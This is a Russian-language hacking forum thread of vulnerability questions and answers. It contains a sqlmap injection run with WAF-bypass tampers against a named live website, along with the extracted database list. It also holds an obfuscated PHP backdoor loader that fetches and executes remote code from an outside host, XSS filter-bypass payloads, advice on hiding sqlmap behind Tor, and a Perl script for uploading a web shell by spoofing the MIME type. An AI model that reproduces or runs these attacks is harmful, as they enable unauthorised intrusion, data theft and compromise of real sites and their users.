Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. lukeone

    lukeone Member

    Joined:
    7 May 2017
    Messages:
    6
    Likes Received:
    17
    Reputations:
    1
    Code:
    python sqlmap.py -u "http://www.mscnano.eu/news.php?id=" --random-agent --hex --threads 1 --dbs --batch --dbms=mysql --technique=U --level 5 --risk 3 --tamper=space2comment,unmagicquotes,escapequotes,versionedkeywords
    
    ---
    Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871,0x775a5551695146647647515859656e61626e6367654643487767764f4e56695a726557454457534a,0x71626b6271),NULL#
    ---

    available databases [64]:
    [*] #mysql50#mysql.old.copia
    [*] 2dspm
    [*] 3s19
    [*] bondslam
    [*] cc
    [*] cees
    [*] cen2018
    [*] computing_resources
    [*] daqm
    [*] dipc
    [*] dipc-courses
    [*] dipc10
    [*] dynapeutics
    [*] e2epol
    [*] eezz18
    [*] etsf
    [*] iegr
    [*] ii
    [*] inelastica
    [*] information_schema
    [*] interfaces2014
    [*] lankor_topa14
    [*] leskovsky
    [*] limage2018
    [*] magnon
    [*] modsurf
    [*] mysql
    [*] n2d
    [*] nanoqi
    [*] nanoqi16
    [*] nanoqi17
    [*] ngsces2018
    [*] oss
    [*] oss18
    [*] pecas
    [*] pecas2019
    [*] pedro
    [*] phpmyadmin
    [*] polymorphs
    [*] prueba
    [*] qdp2018
    [*] quantumchemphys
    [*] quantumdev
    [*] sabat2018
    [*] scom16
    [*] siqew2019
    [*] sos2
    [*] sos22
    [*] test
    [*] theobio17
    [*] tms17
    [*] tmspin
    [*] topadipc
    [*] topadipc2012
    [*] topadipc2014
    [*] topadipc2015
    [*] topadipc2017
    [*] topadipc2018
    [*] topadipcOLD
    [*] topostates
    [*] totalenergy2020
    [*] tstutorial
    [*] webcc
    [*] wikidb

    Вся суть в том, что там стоит какой то фильтр, который сбрасывает соединения при "подозрительных запросах", тамперы в sqlmap помогают всё равно)
     
    Pirnazar and Sola666 like this.
  2. jakonda1001

    jakonda1001 New Member

    Joined:
    17 Mar 2016
    Messages:
    181
    Likes Received:
    4
    Reputations:
    0
    как залиться через это
    1. <?php
    2. @ini_set('display_errors', '0');
    3. error_reporting(0);
    4. if (!$npDcheckClassBgp) {
    5. $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLUocQYT5ZtHJf/cM1fWdrpdmmSLH6uToRkH";
    6. if (ini_get('allow_url_fopen')) {
    7. function get_data_ya($url) {
    8. $data = file_get_contents($url);
    9. return $data;
    10. }
    11. }
    12. else {
    13. function get_data_ya($url) {
    14. $ch = curl_init();
    15. curl_setopt($ch, CURLOPT_HEADER, 0);
    16. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    17. curl_setopt($ch, CURLOPT_URL, $url);
    18. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
    19. $data = curl_exec($ch);
    20. curl_close($ch);
    21. return $data;
    22. }
    23. }
    24. function wp_cd($fd, $fa="")
    25. {
    26. $fe = "wp_frmfunct";
    27. $len = strlen($fd);
    28. $ff = '';
    29. $n = $len>100 ? 8 : 2;
    30. while( strlen($ff)<$len )
    31. {
    32. $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
    33. }
    34. return $fd^$ff;
    35. }
    36. $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    37. preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    38. $dirs = glob("*", GLOB_ONLYDIR);
    39. foreach ($dirs as $dira) {
    40. if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    41. $subdirs = glob("$dira/*", GLOB_ONLYDIR);
    42. foreach ($subdirs as $subdira) {
    43. if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    44. }
    45. }
    46. if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    47. fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    48. fclose($hdl);
    49. include("{$eb}.$algo");
    50. unlink("{$eb}.$algo");
    51. $npDcheckClassBgp = 'aue';
    52. }
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    539
    Likes Received:
    1,007
    Reputations:
    333
    Он тянет, сохраняет и инклудит вот этот http://linksferma.com/lnk/inj.php скрипт. Там уже понятнее, что к чему.
     
  4. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    подскажите друзья есть сайт с гет параметром, добавил в конец ' вышла такая ошибка, думаю есть уязвимость
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near and status=1' at line 1
    1064
    но при попытке раскрутить его мапом выдает ошибку unable to connect to the target URL
    пробывал прокси сунуть такая же беда
     
  5. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,312
    Likes Received:
    10,188
    Reputations:
    115
    TPAXXTOP likes this.
  6. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    227
    Likes Received:
    386
    Reputations:
    100
    Попробуй для начала раскрутить руками. Потом, когда на руках будет раскрученная уязвимость - используй соответствующие тамперы.
     
    ms13 and TPAXXTOP like this.
  8. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    да дело в том что я не умею крутить руками) подскажи как это сделать правильно, или тыкни хоть в какой то мануал пожалуста)
     
  9. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,312
    Likes Received:
    10,188
    Reputations:
    115
    TPAXXTOP likes this.
  10. ilia455

    ilia455 New Member

    Joined:
    7 Sep 2015
    Messages:
    6
    Likes Received:
    1
    Reputations:
    2
    css injection гугли
     
  11. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    299
    Likes Received:
    142
    Reputations:
    2
    запускай тор , в мапе пропиши --tor или юзай прокси
     
  12. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
  13. c4n3k

    c4n3k New Member

    Joined:
    29 Oct 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  14. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Скинь посмотрю
     
    matthhy likes this.
  15. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
    Ребят, кто может помочь.
    Есть ссылка, нашел через NetSparker, она выдает ошибку. Можно ли эту ошибку как-то раскрутить.(адрес по типу https://site.su/fullnews-14
    [​IMG]
     
  16. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Привет есть обходы для фильтра () " ?
    Code:
    <a href="javascript:alert1">XSS</a>
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    onerror=alert;throw 1;

    This works on every browser apart from Firefox *, Safari and IE will just call the function with the argument but Chrome and Opera add uncaught to the argument. This is no big deal though since we can just modify it slightly and use a different object as an argument such as a string.


    onerror=eval;throw'=alert\x281\x29';
     
    _________________________
  18. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Есть сайт на котором разрешено бронировать места, если я создам бота который забронирует все места вызвав финансовые потери, я нарушу закон?
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    Вы что-нибудь слышали об упущенной выгоде?
     
    _________________________
    cat1vo likes this.
  20. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    150
    Likes Received:
    10
    Reputations:
    0
    Есть скрипт на perl c помощью которого я хочу залить на сайт веб шелл с подменой MIME-типа:

    Code:
    #!/usr/bin/perl
    #
    use LWP;
    use HTTP::Request::Common;
    $ua = $ua = LWP::UserAgent->new;;
       $res = $ua->request(POST 'Уязвимый Сайт',
            Content_Type => ' multipart/form-data; boundary="JiFT4QdEESkPzh0ybiDyKsUPi1jnCyFCgVtV4xHE"
    X-Unity-Version: 5.6.5f1',
            Content => [userfile => ["C:/jpeg.jpg.php", "jpeg.jpg.php", "Content-Type" =>"image/png", "iAuid" => "6cb4dbkgvato004v6i4vugq6q2","sSign" => "5msfdbv9gsct64cbo9e3hbc3p0", "content" => "" ],],);
    
    print $res->as_string();

    Но я не могу составить запрос таким образом, чтобы он принял файл. Постоянно натыкаюсь на ошибку 1000(что в скрипте значит - неправильно передан в параметре)
    В самом бурпе натыкаюсь уже на 1002 - (неверный тип файла)
    Подскажите, как правильно составить запрос на PERL, чтобы сайт принимал файл?

    Code:
    <?php
    
    include_once dirname(__FILE__) . '/configuration.php';
    include_once dirname(__FILE__) . '/includes/share/share.class.php';
    
    $oConfig = new JConfig();
    $Image = isset($_POST['content']) ? $_POST['content'] : null;
    if (is_null($Image)) {
        $Image = isset($_FILES['content']) ? $_FILES['content'] : null;
    }
    $Preview = isset($_POST['preview']) ? $_POST['preview'] : '';
    if (empty($Preview)) {
        $Preview = isset($_FILES['preview']) ? $_FILES['preview'] : '';
    }
    $iAuid = isset($_POST['auid']) ? intval($_POST['auid']) : intval($_GET['auid']);
    $sShareType = isset($_POST['shareType']) ? $_POST['shareType'] : '';
    $sSign = isset($_POST['sign']) ? $_POST['sign'] : $_GET['sign'];
    $sBaseUrl = 'http://' . $_SERVER['HTTP_HOST'] . '/';
    if ($Image && $iAuid && $sSign) {
        $sScriptUri = empty($_SERVER['SCRIPT_URI'])
            ? 'http' . (empty($_SERVER['HTTPS']) ? '' : 's') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']
            : $_SERVER['SCRIPT_URI'];
        if (md5($iAuid . $sScriptUri) == $sSign) {
            $oSharer = new GameShare($iAuid, $Image, $Preview, $sShareType, $sSign);
            $oSharer->setConfig($oConfig);
            $sShareUrl = null;
            $iResult = $oSharer->doShare($sShareUrl);
            if ($iResult == 1) {
                print $sBaseUrl . $sShareUrl;
            } else {
                print $sBaseUrl . '?ec=' . $iResult;
            }
        } else {
            error_log('Sign is incorrect => iAuid:' . $iAuid . ' sSign:' . $sSign . ' sScriptUri:' . $sScriptUri);
            print $sBaseUrl . '?ec=1001'; //подпись не совпадает
        }
    } else {
        error_log('Some parameters are not set => iAuid:' . $iAuid . ' sSign:' . $sSign . ' Image:' . ($Image ? '+' : '-'));
        print $sBaseUrl . '?ec=1000'; //пропущены обязательные параметры
    }
    
    Code:
    <?php
    
    include_once dirname(__FILE__).'/../mysql/mysql.class.php';
    
    class GameShare
    {
        private $auid;
        private $shareType;
        private $fileInfo;
        private $previewInfo;
        private $oConfig;
        private $sign;
        private $dbInfo = array();
        private $allowedMime = array(
            'image/png',
            'image/gif',
            'image/jpeg',
        );
    
        /**
         * @param $auid
         * @param $fileInfo
         * @param string $previewInfo
         * @param string $shareType
         * @param string $sign
         */
        public function __construct($auid, $fileInfo = null, $previewInfo = '', $shareType = '', $sign = '')
        {
            $this->auid = $auid;
            $this->fileInfo = $fileInfo;
            $this->previewInfo = $previewInfo;
            $this->shareType = $shareType;
            $this->sign = $sign;
        }
    
        /**
         * @param $sFolder
         */
        private function createFolder($sFolder)
        {
            if (!file_exists($sFolder)) {
                mkdir($sFolder, 0777);
            }
        }
    
        /**
         * @return null|string
         */
        private function createUserFolder()
        {
            if ($this->auid) {
                $shareFolder = dirname(__FILE__) . '/../../' . $this->oConfig->shareFolderName;
                $this->createFolder($shareFolder);
                $shareFolder10000 = $shareFolder . (intval($this->auid/10000)) . '/';
                $this->createFolder($shareFolder10000);
                $shareFolder1000 = $shareFolder10000 . (intval($this->auid/1000)) . '/';
                $this->createFolder($shareFolder1000);
                $shareFolder100 = $shareFolder1000 . (intval($this->auid/100)) . '/';
                $this->createFolder($shareFolder100);
                $shareFolder1 = $shareFolder100 . (intval($this->auid)) . '/';
                $this->createFolder($shareFolder1);
                return $shareFolder1;
            }
    
            return null;
        }
    
        /**
         * @return string
         */
        public function getUserFolder()
        {
            return $this->oConfig->shareFolderName . intval($this->auid/10000) . '/' . intval($this->auid/1000)
                . '/' . intval($this->auid/100) . '/' . intval($this->auid) . '/';
        }
    
        /**
         * @param $oConfig
         */
        public function setConfig($oConfig)
        {
            $this->oConfig = $oConfig;
            $this->dbInfo = array(
                'mysqlHost' => $this->oConfig->host,
                'mysqlUser' => $this->oConfig->user,
                'mysqlPassword' => $this->oConfig->password,
                'mysqlDB' => $this->oConfig->db,
            );
        }
    
        /**
         * @param $auid
         */
        public function setAuid($auid)
        {
            $this->auid = $auid;
        }
    
        /**
         * @param $sResult
         * @return int
         */
        public function doShare(& $sResult)
        {
            $sUserFolder = $this->createUserFolder();
            if (!$sUserFolder) return 1003; //ошибка при загрузке файла на сервер
    
            $time = time();
    
            // Заливаем основную картинку
            $imageInfo = getimagesize($this->fileInfo['tmp_name']);
            if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
            if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
            $aExt = explode('/', $imageInfo['mime']);
            $fileName = $time . '.' . $aExt[1];
            $sDest = $sUserFolder . $fileName;
            move_uploaded_file($this->fileInfo['tmp_name'], $sDest);
    
            // Заливаем превью (если есть что)
            $previewFileName = '';
            if ($this->previewInfo) {
                $imageInfo = getimagesize($this->previewInfo['tmp_name']);
                if (empty($imageInfo[0]) || empty($imageInfo[1])) return 1002; //неверный тип файла
                if (!in_array($imageInfo['mime'], $this->allowedMime)) return 1002; //неверный тип файла
                $aExt = explode('/', $imageInfo['mime']);
                $previewFileName = $time . '-thumb.' . $aExt[1];
                $sDest = $sUserFolder . $previewFileName;
                move_uploaded_file($this->previewInfo['tmp_name'], $sDest);
            }
    
            // Сохраняем, формируем ответ, если ОК
            $iResult = $this->save($fileName, $previewFileName);
            if (!$iResult) return 1004;
            $sResult = '?share='.$iResult;
    
            return 1;
        }
    
        /**
         * @param $fileName
         * @param string $previewFileName
         * @return mixed
         */
        public function save($fileName, $previewFileName = '')
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oSQL->query('INSERT INTO tbl_share_info (auid, filename, preview_filename, sharedate) VALUES ('
                . intval($this->auid) . ', "' . $fileName . '", "' . $previewFileName . '", NOW())');
    
            return $oSQL->insert_id;
        }
    
        /**
         * @param $id
         * @return mixed
         */
        public function get($id)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE id=' . intval($id));
    
            return $oResult->fetch_array();
        }
    
        /**
         * @param $id
         * @return int
         */
        public function getPrev($id)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT MAX(id) as prev FROM tbl_share_info WHERE id<' . intval($id));
            $aRow = $oResult->fetch_array();
    
            return intval($aRow['prev']);
        }
    
        /**
         * @param $id
         * @return int
         */
        public function getNext($id)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT MIN(id) as next FROM tbl_share_info WHERE id>' . intval($id));
            $aRow = $oResult->fetch_array();
    
            return intval($aRow['next']);
        }
    
        /**
         * @param $auid
         * @return mixed
         */
        public function checkUserScreens($auid)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT COUNT(*) AS iCnt FROM tbl_share_info WHERE auid=' . intval($auid));
            $aRow = $oResult->fetch_assoc();
    
            return $aRow['iCnt'];
        }
    
        /**
         * @param $auid
         * @return array
         */
        public function getUserScreens($auid)
        {
            $oSQL = mysqlConnect::getInstance($this->dbInfo);
            $oResult = $oSQL->query('SELECT * FROM tbl_share_info WHERE auid=' . intval($auid) . ' ORDER BY sharedate DESC');
            $aResult = array();
            while ($aRow = $oResult->fetch_assoc()) {
                $aResult[] = $aRow;
            }
    
            return $aResult;
        }
    }
    
     
Loading...